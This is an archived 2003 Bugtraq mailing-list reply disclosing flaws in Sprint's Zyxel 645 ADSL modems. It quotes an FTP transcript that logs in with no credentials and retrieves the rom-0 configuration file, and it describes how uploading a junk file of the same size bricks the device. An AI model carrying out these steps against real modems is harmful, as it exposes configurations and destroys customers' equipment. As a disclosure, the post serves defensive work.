[28592] in bugtraq
Re: SPRINT ADSL [Zyxel 645 Series Modem]
daemon@ATHENA.MIT.EDU (Raymond Dijkxhoorn)
Thu Jan 23 16:04:16 2003
Date: Thu, 23 Jan 2003 17:05:29 +0100 (CET)
From: Raymond Dijkxhoorn <raymond@prolocation.net>
To: "http-equiv@excite.com" <http-equiv@malware.com>
In-Reply-To: <200301231536.h0NFaIZ23356@web173.megawebservers.com>
Message-ID: <Pine.LNX.4.44.0301231700540.10234-100000@webber.prolocation.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi!
> shows 800 out of 2000 [of 100,000 or so] affected modems. Closer
> examination confirms:
> ftp> open malware.com
> Connected to malware.com.
> 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> User (malware.com:(none)):
> 331 Enter PASS command
> Password:
> 230 Logged in
> ftp> get rom-0
> 200 Port command okay
> 150 Opening data connection for RETR rom-0
> 226 File sent OK
> ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec.
> ftp>
Its even worse, if you upload a config file, same size as the rom-0 file,
but filled with total crap the modem reboots (it does thatautomaticlty
after uploading a new image) and after that the modem is broken. You ONLY
have the ability to upload a new image via a serial port then, and most
customers just have to bring back their unit. The modem is waiting after
upload of a broken image, with a x-modem session. And there it ends. Even
if you upload the previous image it wont work. Nice stuff :(
There are two files you can toy around with in this case, ras and rom-o
ras is the image file, rom-0 is 'just' the config.
Bye,
Raymond.
